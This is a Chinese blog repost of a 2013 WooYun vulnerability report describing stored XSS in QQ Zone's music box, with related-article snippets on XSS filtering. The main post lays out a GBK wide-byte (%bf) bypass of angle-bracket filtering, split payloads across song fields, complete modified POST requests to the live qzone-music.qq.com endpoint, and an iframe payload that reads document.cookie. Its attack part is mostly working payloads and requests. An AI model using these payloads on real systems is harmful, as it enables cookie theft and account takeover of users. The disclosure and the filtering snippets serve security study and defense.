绕开js字符过滤

最新推荐文章于 2021-11-22 20:32:34 发布
最新推荐文章于 2021-11-22 20:32:34 发布
阅读量1.2k 收藏
点赞数
分类专栏: 其他

转载自http://www.wooyun.org/bugs/wooyun-2013-027762



有问题的地址是:http://qzone-music.qq.com/fcg-bin/fcg_music_fav_getinfo.fcg?dirinfo=1&dirid=201&uin=QQ号码&p=0.887586027616635&inCharset=GB2312&outCharset=utf-32&hostUin=&notice=0&needNewCode=0&format=jsonp&platform=musicbox&jsonpCallback=jsonCallback



这个地址会输出QQ号码在QQ空间音乐盒中【我喜欢】这个专辑中的音乐内容,包括歌手,歌曲名,歌曲地址等信息。



正常情况下,歌手名字,歌曲名,歌曲地址里的< , >都会被过滤掉,即过滤成为 &lt; &gt;



在这一步,我们对应的绕过方法是:



%bf<script/%bf>



原理是:服务器上会过滤数据中的特殊符号,但是当读取到%bf时,会认为%bf<是一个GBK字符,从而当作一个字符来看待。 即过滤程序会把上面的内容看作是:



[GBK字符]script/[GBK字符]



然后当上面内容输出到页面的时候,内容则会变为



口<script/口> (其中“口”为不被识别的字符)



从而,我们插入了一个<script>



---------------------------------------------------------------



通过以上方法,我们可以写出以下代码



%bf<script/%bf>alert(1);%bf</script/%bf>





不幸的是,在歌曲标题内插入这段内容后,发现(, ) 都被转义成为 &#xxxx; 的形式了。



alert没法执行了,而且,括号都用不了,代码就执行不了了。



---------------------------------------------------------------



然而,我们是可以控制多个输出点的。 如下,songname, singername, url





songname:"控制点1",singerid:0,singername:"控制点2",url:"控制点3"





也就是说,我们可以采用注释的办法来进入后面的点,如下:



songname:"aaaaaaa",singerid:0,singername:"口<script/口>/*",url:"*/;alert(1)//"





但是这个点中,*都被过滤成 &#xxxx 了。继续测试发现,不仅是括号,星号,连=, + ,%,基本只要是符号,都过滤的差不多了。还好,[,], / 没被过滤。 加上我们意外的惊喜发现,url和songname,singername的过滤规则不同,并没有过滤如此多的符号。所以:



songname:"aaaaaaa",singerid:0,singername:"口<script/口>[",url:"];alert(1)/*"





---------------------------------------------------------------



上面这首歌,完成了 <script>[",url:"];alert(1)/* ....



再编辑下一首歌,修改songname,加入</script>以闭合脚本标签。



songname:"口*///口</script/口>",singerid:0,......





最后就成功构造了。具体利用过程写在了漏洞证明里。

漏洞证明:

进QQ空间音乐盒中的【我喜欢】目录中,



1. 先修改第一首歌,抓包,修改包



URL:http://qzone-music.qq.com/cgi-bin/v5/cgi_music_modsong_new?g_tk=1232408522



发第一个包, 修改了包里的url和singer参数



formsender=1&out=2&from=1&source=103&uin=8639560&songid=4283798478&type=1&urlchanged=1&moodchanged=0&url=];alert(1);/*http%3A%2F%2Fwww.baidu.com%2F1.wma&songtitle=aaa&singer=%bf<script/%bf>[&dirid=201&desc=&inCharset=GB2312&hostUin=8639560&notice=0&needNewCode=0&g_tk=1232408522&format=fs&platform=musicbox&outCharset=gb2312







2. 再修改第二首歌,抓包,修改包, 地址同1,修改了songtitle参数



formsender=1&out=2&from=1&source=103&uin=8639560&songid=2329826814&type=1&urlchanged=0&moodchanged=0&url=http%3A%2F%2Fwww.baidu.com%2F1.mp3&songtitle=%bf*///%bf</script/%bf>&singer=%CE%D2%C3%C7%B5%C4%B0%AE&dirid=201&desc=&inCharset=GB2312&hostUin=8639560&notice=0&needNewCode=0&g_tk=1232408522&format=fs&platform=musicbox&outCharset=gb2312




3. 最后效果如下:






4. 然后利用iframe来利用即可。



<iframe name="alert(document.cookie)" src="http://qzone-music.qq.com/fcg-bin/fcg_music_fav_getinfo.fcg?dirinfo=1&dirid=201&uin=QQ号码&format=jsonp&platform=musicbox&jsonpCallback=jsonCallback">





stnye
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss绕过字符过滤_xss绕过过滤方法
weixin_39654848的博客
12-21 943
很多网站为了避免XSS的攻击,对用户的输入都采取了过滤,最常见的就是对<>转换成<以及>,经过转换以后<>虽然可在正确显示在页面上,但是已经不能构成代码语句了。这个貌似很彻底,因为一旦<>被转换掉,什么就会转换成“<script src=1.js></script>”,不能执行,因此,很多人认为只要用户的输入没有构成<&...
javascript过滤XSS
05-06
用javascript写的过滤XSS代码,危险代码被转义而不是被删除. 根目录下js-xss-master/dist/test.html是例子.
防止xss和sql注入:JS特殊字符过滤正则
12-01
代码如下:function stripscript(s) { var pattern = new RegExp(“[%–`~!@#$^&*()=|{}’:;’,\\[\\].<>/?~!@#¥……&*()——|{}【】‘;:”“’。,、?]”)        //格式 RegExp(“[在中间定义特殊过滤字符]”)var rs = “”; for (var i = 0; i < s.length; i++) {  rs = rs+s.substr(i, 1).replace(pattern, ”); }return rs;}
字符过滤
07-24
在实例中,我们用Filter主要是来设置字符集,防止jsp出现中文乱码现象
js过滤特殊字符的正则表达式
10-28
js中用正则表达式 过滤特殊字符 ,校验所有输入域是否含有特殊符号
js 前端处理xss攻击,对危险的字符串进行过滤
PrimaryColor
04-01 6165
es6: npm install xss --save 这里测试使用的是es5,下载链接: https://download.csdn.net/download/qq_42740797/16291859 https://raw.githubusercontent.com/leizongmin/js-xss/master/dist/xss.js过滤的比较严重,将html的所有属性都给过滤了) 调用函数: function filterXSS(string) html: <!.
jsp自定义标签过滤XSS安全字符
jianjun2114的博客
04-18 898
1.创建自定义标签类 public class XssTag extends SimpleTagSupport { @Override public void doTag() throws JspException, IOException { } } 2.创建xss.tld文件,并注册标签类 <?xml version="1...
xss过滤技巧
Richard_qi的博客
04-11 3646
xss过滤技巧(个人记录) 改变大小写 在测试过程中,我们可以改变测试语句的大小写来绕过XSS规则: 比如:<script>alert(“xss”);</script>可以转换为: <ScRipt>ALeRt(“XSS”);</sCRipT> 关闭标签 有时候我们需要关闭标签来使我们的XSS生效。 比如:“><script>alert(“Hi”);</script> 使用hex编码绕过 我们可以对我们的语句进行hex编码来绕过X
关于XSS过滤
lanisa的专栏
10-30 1620
XSS攻击绕过过滤方法大全(约100种) XSS攻击绕过过滤方法大全(约100种) - 付杰博客 解决办法: 1.增加前端过滤 可参考:https://www.cnblogs.com/caizhenbo/p/6836390.html 【前端安全】JavaScript防XSS攻击 xss前端过滤工具:https://cdn.bootcdn.net/ajax/libs/js-xss/0.3.3/xss.min.js 使用方法:https://www.cnblogs.com/fyjz/p/11905.
js xss 过滤基本正则(只能过滤基本常用的)
gyq04551的博客
05-18 3585
let a = html.replace(/&lt;script/g, "&amp;lt;script").replace(/script&gt;/g, 'script&amp;gt;').replace(/&lt;img/g, "&amp;lt;img").replace(/&lt;script.*&gt;.*&lt;\/script.*&gt;/g, "").replace(/on(error|m...
XSS篇——XSS过滤绕过技巧
weixin_50464560的博客
05-07 3531
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 改变大小写 在测试过程中,我们可以改变测试语句的大小写来绕过XSS规则: 比如:<script>alert(“xss”);</script>可以...
JavaScript过滤XSS
weixin_39664733的博客
11-22 2169
var filterXSS=function(oriStr){ if(!oriStr){ return oriStr; } var charCodes=['3c','3e','27','22','28','29','60',{format:'script{}',chr:'3a'}];//要转义字符的16进制ASCII码[1< 2> 3' 4" 5( 6) 7`] var xssChars=[],filterChars=[],tmpFormat='{}',tmpChr; for(var
JS特殊字符过滤,防止xss和sql注入。
dfsafsd32323的博客
04-18 936
function stripscript(s) { var pattern = new RegExp("[%--`~!@#$^&*()=|{}':;',\\[\\].<>/?~!@#¥……&*()——|{}【】‘;:”“'。,、?]") //格式 RegExp("[在中间定义特殊过滤字符]")var rs = ""; for (var i = 0...
渗透测试XSS跨站漏洞input输入js特殊字符过滤
a1604914398的博客
05-09 5627
修复建议:建议对用户得输入与输出进行过滤过滤一些比较危险得标签和关键字,如<script></script>、alert等 代码如下:在input输入框加入onblur事件;定义onblur="checkText('id',this.value)";id为文本框DOMid属性 //验证文本框输入特殊字符 function checkText(id,text){/...
javascript createelement_看我如何利用JavaScript全局变量绕过XSS过滤
weixin_39731107的博客
11-29 124
译文声明:本文是翻译文章,文章原作者secjuice,文章来源:secjuice.com原文地址:https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/译文仅供参考,具体内容表达以及含义原文为准◆◆◆ ◆◆写在前面的话如果你发现你的攻击目标存在XSS漏洞,但是你所有的漏洞利用尝...
【转载】目前主流过滤XSS的三种技术
weixin_30697239的博客
11-07 2510
目前主流过滤XSS的三种技术 过滤 过滤,顾名思义,就是将提交上来的数据中的敏感词汇直接过滤掉。例如对"<script>"、"<a>"、"<img>"等标签进行过滤,有的是直接删除这类标签中的内容,有的是过滤掉之类标签中的on事件或是'javascript'等字符串,让他们达不到预期的DOM效果。 编码 像一些常见的字符,如"<"、">"等。...
springmvc绕开登录
最新发布
08-29
SpringMVC本身并不直接提供绕过登录的功能,它是一个基于Model-View-Controller设计模式的轻量级Web框架,用于处理HTTP请求并将其映射到相应的处理程序。绕过登录通常涉及到权限控制和安全策略,而不是SpringMVC框架...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值